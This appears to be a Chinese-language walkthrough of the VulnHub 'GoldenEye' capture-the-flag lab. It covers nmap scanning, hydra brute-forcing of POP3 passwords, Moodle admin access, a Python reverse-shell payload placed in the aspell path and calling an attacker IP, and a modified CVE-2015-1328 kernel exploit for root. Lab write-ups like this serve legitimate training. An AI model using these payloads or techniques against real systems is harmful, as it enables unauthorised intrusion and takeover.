| 【vulnhub】GoldenEye | 您所在的位置:网站首页 › telnet密码爆破 › 【vulnhub】GoldenEye |
|
信息收集
image.png
安装好靶机以后,netdiscover检测到目标ip地址为:192.168.3.131
快速扫描靶机提供的服务:
image.png
只探测到了80端口和25端口。ok,打开http服务查看一下:
image.png
显示在/sev-home/里有登录模块,打开查看,有一个http的验证框
image.png
关掉验证框,回到首页,查看html的源代码:
image.png
发现一个叫terminal.js的东西,点击查看:
image.png
在注释里,我们得到了两个用户名:boris和natalya,以及一串看起来是被加密的密码:
InvincibleHack3r
直接把上面这串东西丢到,谷歌输入框直接就解码成了明文:
image.png
密码是:InvincibleHack3r
现在我们用boris:InvincibleHack3r登录上面的/sev-home/,得到页面:
image.png
留意文字,期中提到:
Remember, since security by obscurity is very effective, we have configured our pop3 service to run on a very high non-default port
有一个pop3服务开启了,但不是放在默认的端口(110),我们上面只扫到了80和25端口,看来要全端口扫描一次:
执行:
nmap -sS -sV -p 1~65535 -A 192.168.3.131
image.png
再次扫出两个高段的端口,55006看上去是开启了ssl服务,那55007应该就是pop3服务的端口
虽然nmap这里没有显示出来,但是可以用msf验证一下:
image.png
成功验证55007位pop3端口
在http://192.168.3.131/sev-home/里,第二段话内容被加粗了,看起来邮箱里会有些什么线索。 image.png多说两句smtp和pop3服务,smtp是邮件服务器之间的通信协议,pop3是个人与邮件服务器之间的通信协议。 比如说我和小明通信,我用的是Gmail邮箱 服务,小明用的是QQ邮箱服务,我给小明发一封邮件。Gmail投递到QQ的邮件服务器,用的是smtp服务,小明登录自己的账号拉取邮件的时候用的就是pop3服务。 攻击只要我们知道了用户名和密码,就可以通过pop3协议登录个人的邮箱,查看邮件内容。那么现在,我们根据上面收集到的两个用户名boris和natalya,制作成一个用户字典user.txt,再用hydra爆破这两个账号的pop3密码 执行:hydra -L /root/user.txt -P /usr/share/wordlists/fasttrack.txt pop3://192.168.3.131 -s 55007 image.png 成功爆破到两个账号的密码: login: boris password: secret1! login: natalya password: bird用telnet 192.168.3.131 55007登录boris的邮箱,发现有三封邮件 image.png逐一查看邮件: image.png 没有太多有用的信息,登录natalya的账号: image.png 有两份邮件,查看: image.png 发现了一组登录信息,并且邮件里说/gnocertdir/是登陆的网站,不过需要在本地host文件里,把这个域名和域名做绑定,否则会被重定向到某个网站,把这行添加到host里面: image.png ok,打开/gnocertdir/,显示一个登陆页面 image.png 用上面的信息登录 username: xenia password: RCP90rulez! image.png 显示一个叫moodle的cms的后台,我尝试在这个后台里找了很多可以上传后门的攻击点,都一一失败了,上传后的文件只能供下载,不能查看。看来此路不通。 线上搜索moodle的可利用漏洞,msf里有一个现成的,但貌似不行。心灰意冷之际,随便查看了一下这个后台的其他模块,发现了一封站内邮件: image.png 看来是一个叫doak的管理员发来的信件,ok,现在我们又找到一个用户名,再次爆破这个用户的邮件密码: image.png 得到登录信息:login: doak password: goat 登录这个账号的邮箱,查看邮件 image.png 再次得到一个后台管理人员的登陆信息: username: dr_doak password: 4England! 用这个信息登录后台,看到一个私密文件s3cret.txt: image.png 按照提示,在url打开/dir007key/for-007.jpg,显示一张图片: image.png 底下一行文字显示:picked up a lift access key,应该是提示在图片里找线索,把图片下载到本地查看属性,发现标题被加密了,看样子像base64加密的 image.png 用hackbar工具解密出来 image.png 得到明文:xWinter1995x! 用账号admin尝试登陆,登陆成功,超级管理员账号下多了几个模块。 image.png在admin下的攻击我枚举了很久,最后还是参考了网上其他大佬的方法。 首先: 在Home / ► Site administration / ► Plugins / ► Text editors / ► TinyMCE HTML editor下,把Spell engine设置为Pspellshell image.png 第二步,构建一个反弹shell,payload为: python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.3.97",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'当然IP和端口要换成你自己的。 去到Home / ► Site administration / ► Server / ► System paths 把上面的payload放到Path to aspell image.png第三步,在攻击机开启nc监听:nc -lvp 6666 image.png第四步,在后台点击任何一个富文本编辑器,点击拼写检查按钮,就是圈起来的那个地方: image.png成功获得一个反弹shell image.png 提权查看靶机内核 image.png显示内核版本为:Linux ubuntu 3.13.0-32-generic 在攻击机开启一个http服务,从靶机下载les.sh到本地,枚举提权漏洞 image.png选择内核版本和靶机一样的CVE-2015-1328 image.png 编译以后传到靶机,发现失败了 image.png 提示靶机没有gcc编译,我们查看攻击代码,发现其中有一行为: image.png 这里有需要用到gcc命令,我们把 lib = system("gcc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); 改为: lib = system("cc -fPIC -shared -o /tmp/ofs-lib.so /tmp/ofs-lib.c -ldl -w"); 编译,下载,执行 image.png 拿到root权限 查找flag,需要用ls -alh显示隐藏文件 image.png 根据.flag.txt提示打开http://severnaya-station.com/006-final/xvf7-flag/ image.png 总结感觉vulnhub的靶机都是这种风格,一环接一环,像寻宝一样,真实环境的渗透,可能不太会有这种情况,不过当一个游戏玩的话,每找到一个新的线索时还是挺令人兴奋的。 攻击手段算是开了眼界,再也不是msf一把唆,但是攻击原理后面还是要再深入了解一下。。 提权的时候要学位根据错误提示修改提权脚本,这台靶机没有gcc编译,但是支持cc编译。cc是Unix系统的C Compiler,而gcc则是GNU Compiler Collection,属于linux。这些都要靠积累,不是C/C++程序员可能不太清楚这之间的联系和分别。 |
| CopyRight 2018-2019 实验室设备网 版权所有 |